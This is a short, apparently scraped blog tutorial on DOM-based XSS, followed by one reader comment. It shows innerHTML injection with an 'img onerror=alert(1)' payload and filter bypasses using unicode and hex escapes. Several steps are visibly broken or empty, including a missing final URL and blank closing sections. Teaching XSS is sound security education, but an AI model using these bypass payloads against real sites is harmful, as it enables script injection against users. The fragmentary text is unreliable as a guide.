Dom Based XSS – Introduction

Introduction to DOM based XSS:
why to waste time in writing same thing again if you can read from online contents.

Discovering and Exploiting:
1) Before learning DOM Based XSS, have few basics of html and JS.

< div id=”name”>hello</div>
< script>
</ script>


2) aaaaa can be replaced by as follows:

< div id=”name”>hello</div>
< script>
document.getElementById(“name”).innerHTML=”<img src=1 onerror=alert(1)>”;
</ script>



3) This time it resulted in pop 1 but not everytime:
Javascript string of characters can be written as unicode encoding. So, < can be written as \u003c and > can be written as \u003e. You can find any online tool to do this.

< div id=”name”>hello</div>
< script>
document.getElementById(“name”).innerHTML=”\u003cimg src=1 onerror=alert(1)\u003e”;
</ script>


4) This all seems to be ridiculous right now, but will help in the later explanation

5) Let’s analyze it through an example:
Relevant source code view: ( snippet)
< strong id=”titlename”>Searched by brand:aaaaaaa</strong></div>
< script>
if (“brand 1” == “category 1”) document.getElementById(“titlename”).innerHTML=”Search:aaaaaaa“;
if (“brand 1” == “category 2”)
if (“brand 1” == “category 3”)
</ script>

6) In JS string to characters, we know, < > are filtered, so how do we approach.
Let’s see.
Note: We are dealing with situations where innerHTML = [“out”]
if (“brand 1” == “category 1”)
\u003cimg src=1 onerror=alert(1)\u003e“;
This will result in pop1.

This is not where it ends, if space is filter out. Let’s see the payload
if (“brand 1” == “category 1”)
“Search: \u003cimg\u0020src=1\u0020onerror=alert(1)\u003e“;

This could also result in pop1 but again filter comes into action. If \u003c and \u003e are filtered out, these are converted to &lt; and &gt;
Now what???
Now, see if \u003c is only filtered or \u0020 and \u003c bothfiltered. If only, \u003c is filtered out, we came to know that only specific keywords are filtered.
We have other ways to bypass, < can be written as \x3c and > as \x3e.

7) Final url becomes:
So , finally this pops up.

This cover following DOM XSS types:

There are some sites that use a third-party JS libraries, such as jQuery, there will be

Finally, of course, also we need to mention some caveats.


One thought on “Dom Based XSS – Introduction

  1. good explanation.but could have dealt more at tool level and some practical scenarios which include other potential areas such as vulnerable JS methods etc.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s